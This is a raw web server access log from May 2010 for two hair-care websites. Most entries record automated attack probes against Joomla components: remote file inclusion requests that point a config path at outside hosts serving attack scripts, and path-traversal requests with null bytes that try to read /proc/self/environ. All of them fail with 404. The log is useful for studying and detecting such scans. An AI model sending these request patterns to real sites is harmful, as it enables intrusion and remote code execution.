77.88.25.28 - - [02/May/2010:19:25:25 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13978 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
91.212.226.210 - - [02/May/2010:19:31:33 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible- MSIE 6.0- Windows NT 5.1- SV1- .NET CLR 1.1.4322" "freehairsecrets.com"
91.212.226.210 - - [02/May/2010:19:31:33 -0700] "GET / HTTP/1.0" 200 910 "http://freehairsecrets.com/" "Mozilla/4.0 (compatible- MSIE 6.0- Windows NT 5.1- SV1- .NET CLR 1.1.4322" "freehairsecrets.com"
78.110.50.139 - - [02/May/2010:19:31:47 -0700] "GET /logs/access_100125.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [02/May/2010:19:31:47 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [02/May/2010:19:31:47 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [02/May/2010:19:31:50 -0700] "GET /logs/access_100125.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [02/May/2010:19:31:50 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [02/May/2010:19:31:50 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [02/May/2010:19:33:23 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
78.110.50.139 - - [02/May/2010:19:33:23 -0700] "GET /logs/access.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
78.110.50.139 - - [02/May/2010:19:33:23 -0700] "GET /logs/access.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
78.110.50.139 - - [02/May/2010:19:33:23 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
78.110.50.139 - - [02/May/2010:19:33:23 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
78.110.50.139 - - [02/May/2010:19:33:23 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
91.212.226.240 - - [02/May/2010:19:39:59 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)" "growlonghairfast.com"
91.212.226.240 - - [02/May/2010:19:39:59 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)" "growlonghairfast.com"
99.39.2.249 - - [02/May/2010:19:42:23 -0700] "GET /logs/access_100419.log//admin.php?Htmls=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
99.39.2.249 - - [02/May/2010:19:42:23 -0700] "GET /admin.php?Htmls=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
99.39.2.249 - - [02/May/2010:19:42:24 -0700] "GET /logs//admin.php?Htmls=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
202.67.9.202 - - [02/May/2010:19:43:19 -0700] "GET /logs/access_100405.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://freetrannydownloads.com/linktrade/lc1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
202.67.9.202 - - [02/May/2010:19:43:19 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://freetrannydownloads.com/linktrade/lc1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
202.67.9.202 - - [02/May/2010:19:43:19 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://freetrannydownloads.com/linktrade/lc1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.195.112.151 - - [02/May/2010:19:45:03 -0700] "GET /logs/access_091026.log HTTP/1.0" 200 562644 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
119.235.237.16 - - [02/May/2010:19:45:04 -0700] "GET /freehairsecretsphp/viewtopic.php?p=17234 HTTP/1.1" 200 349 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "freehairsecrets.com"
77.88.25.28 - - [02/May/2010:19:49:29 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13228 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
91.212.226.240 - - [02/May/2010:19:50:19 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; TheFreeDictionary.com; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)" "freehairsecrets.com"
91.212.226.240 - - [02/May/2010:19:50:19 -0700] "GET / HTTP/1.0" 200 910 "http://freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; TheFreeDictionary.com; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)" "freehairsecrets.com"
77.88.25.28 - - [02/May/2010:19:50:35 -0700] "GET /freehairsecretsphp/viewtopic.php?p=18870 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
121.88.4.141 - - [02/May/2010:19:58:08 -0700] "GET /logs/access.log//index.php?option=com_pccookbook&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
121.88.4.141 - - [02/May/2010:19:58:10 -0700] "GET /index.php?option=com_pccookbook&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
121.88.4.141 - - [02/May/2010:19:58:11 -0700] "GET /logs//index.php?option=com_pccookbook&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
121.88.4.141 - - [02/May/2010:19:58:59 -0700] "GET /logs/access.log//index.php?option=com_pccookbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
121.88.4.141 - - [02/May/2010:19:59:01 -0700] "GET /index.php?option=com_pccookbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
121.88.4.141 - - [02/May/2010:19:59:03 -0700] "GET /logs//index.php?option=com_pccookbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
121.88.4.141 - - [02/May/2010:19:59:31 -0700] "GET /logs/access.log//index.php?option=com_pccookbook&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
121.88.4.141 - - [02/May/2010:19:59:32 -0700] "GET /index.php?option=com_pccookbook&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
121.88.4.141 - - [02/May/2010:19:59:34 -0700] "GET /logs//index.php?option=com_pccookbook&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
89.46.32.198 - - [02/May/2010:20:01:57 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Maxthon; .NET CLR 1.1.4322)" "growlonghairfast.com"
89.46.32.198 - - [02/May/2010:20:01:57 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Maxthon; .NET CLR 1.1.4322)" "growlonghairfast.com"
60.195.24.252 - - [02/May/2010:20:03:43 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; FDM)" "growlonghairfast.com"
211.138.124.202 - - [02/May/2010:20:04:11 -0700] "GET /freehairsecretsphp/index.php HTTP/1.1" 200 349 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; FDM)" "growlonghairfast.com"
200.81.202.164 - - [02/May/2010:20:04:27 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; FDM)" "growlonghairfast.com"
60.195.24.252 - - [02/May/2010:20:04:30 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; FDM)" "growlonghairfast.com"
210.212.195.193 - - [02/May/2010:20:04:55 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; FDM)" "growlonghairfast.com"
120.138.118.234 - - [02/May/2010:20:05:02 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; FDM)" "growlonghairfast.com"
218.204.29.110 - - [02/May/2010:20:05:08 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; FDM)" "growlonghairfast.com"
60.195.24.252 - - [02/May/2010:20:05:21 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; FDM)" "growlonghairfast.com"
60.195.24.252 - - [02/May/2010:20:05:27 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; FDM)" "growlonghairfast.com"
210.212.195.193 - - [02/May/2010:20:05:49 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; FDM)" "growlonghairfast.com"
62.80.1.40 - - [02/May/2010:20:05:53 -0700] "GET /freehairsecretsphp/index.php HTTP/1.1" 200 349 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; FDM)" "growlonghairfast.com"
198.54.202.195 - - [02/May/2010:20:06:20 -0700] "GET /freehairsecretsphp/index.php HTTP/1.1" 200 349 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; FDM)" "growlonghairfast.com"
210.212.195.193 - - [02/May/2010:20:07:03 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; FDM)" "growlonghairfast.com"
202.67.9.202 - - [02/May/2010:20:07:47 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://freetrannydownloads.com/linktrade/lc1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
202.67.9.202 - - [02/May/2010:20:07:47 -0700] "GET /logs/access_091228.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://freetrannydownloads.com/linktrade/lc1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
202.67.9.202 - - [02/May/2010:20:07:47 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://freetrannydownloads.com/linktrade/lc1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.88.4.141 - - [02/May/2010:20:09:04 -0700] "GET /logs/access.log//index.php?option=com_pccookbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
121.88.4.141 - - [02/May/2010:20:09:06 -0700] "GET /index.php?option=com_pccookbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
121.88.4.141 - - [02/May/2010:20:09:08 -0700] "GET /logs//index.php?option=com_pccookbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
207.45.178.42 - - [02/May/2010:20:12:26 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
207.45.178.42 - - [02/May/2010:20:13:04 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
77.88.25.28 - - [02/May/2010:20:16:52 -0700] "GET /freehairsecretsphp/viewtopic.php?p=18892 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
121.88.4.141 - - [02/May/2010:20:18:05 -0700] "GET /logs/access.log//index.php?option=com_pccookbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
121.88.4.141 - - [02/May/2010:20:18:07 -0700] "GET /index.php?option=com_pccookbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
121.88.4.141 - - [02/May/2010:20:18:10 -0700] "GET /logs//index.php?option=com_pccookbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
78.110.50.120 - - [02/May/2010:20:20:25 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://freetrannydownloads.com/linktrade/lc1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.120 - - [02/May/2010:20:20:25 -0700] "GET /logs/access_100125.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://freetrannydownloads.com/linktrade/lc1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.120 - - [02/May/2010:20:20:26 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://freetrannydownloads.com/linktrade/lc1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.120 - - [02/May/2010:20:21:32 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://freetrannydownloads.com/linktrade/lc1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.120 - - [02/May/2010:20:21:32 -0700] "GET /logs/access_091123.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://freetrannydownloads.com/linktrade/lc1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.120 - - [02/May/2010:20:21:32 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://freetrannydownloads.com/linktrade/lc1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
207.45.178.42 - - [02/May/2010:20:22:08 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
207.45.178.42 - - [02/May/2010:20:22:08 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
207.45.178.42 - - [02/May/2010:20:22:08 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
121.88.4.141 - - [02/May/2010:20:22:14 -0700] "GET /logs/access.log//index.php?option=com_pccookbook&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
121.88.4.141 - - [02/May/2010:20:22:16 -0700] "GET /index.php?option=com_pccookbook&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
121.88.4.141 - - [02/May/2010:20:22:16 -0700] "GET /logs//index.php?option=com_pccookbook&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
207.45.178.42 - - [02/May/2010:20:22:22 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
207.45.178.42 - - [02/May/2010:20:22:22 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
207.45.178.42 - - [02/May/2010:20:22:23 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
78.110.50.120 - - [02/May/2010:20:22:26 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://freetrannydownloads.com/linktrade/lc1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
78.110.50.120 - - [02/May/2010:20:22:26 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://freetrannydownloads.com/linktrade/lc1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
78.110.50.120 - - [02/May/2010:20:22:26 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://freetrannydownloads.com/linktrade/lc1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
78.110.50.120 - - [02/May/2010:20:24:14 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://freetrannydownloads.com/linktrade/lc1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
78.110.50.120 - - [02/May/2010:20:24:14 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://freetrannydownloads.com/linktrade/lc1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
78.110.50.120 - - [02/May/2010:20:24:15 -0700] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://freetrannydownloads.com/linktrade/lc1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
78.110.50.120 - - [02/May/2010:20:26:30 -0700] "GET /logs/access_100125.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://freetrannydownloads.com/linktrade/lc1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.120 - - [02/May/2010:20:26:30 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://freetrannydownloads.com/linktrade/lc1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.120 - - [02/May/2010:20:26:30 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://freetrannydownloads.com/linktrade/lc1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.120 - - [02/May/2010:20:27:04 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://freetrannydownloads.com/linktrade/lc1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
78.110.50.120 - - [02/May/2010:20:27:04 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://freetrannydownloads.com/linktrade/lc1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
78.110.50.120 - - [02/May/2010:20:27:04 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://freetrannydownloads.com/linktrade/lc1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
202.67.9.202 - - [02/May/2010:20:34:14 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://freetrannydownloads.com/linktrade/lc1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
202.67.9.202 - - [02/May/2010:20:34:14 -0700] "GET /logs/access_100315.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://freetrannydownloads.com/linktrade/lc1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
202.67.9.202 - - [02/May/2010:20:34:14 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://freetrannydownloads.com/linktrade/lc1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
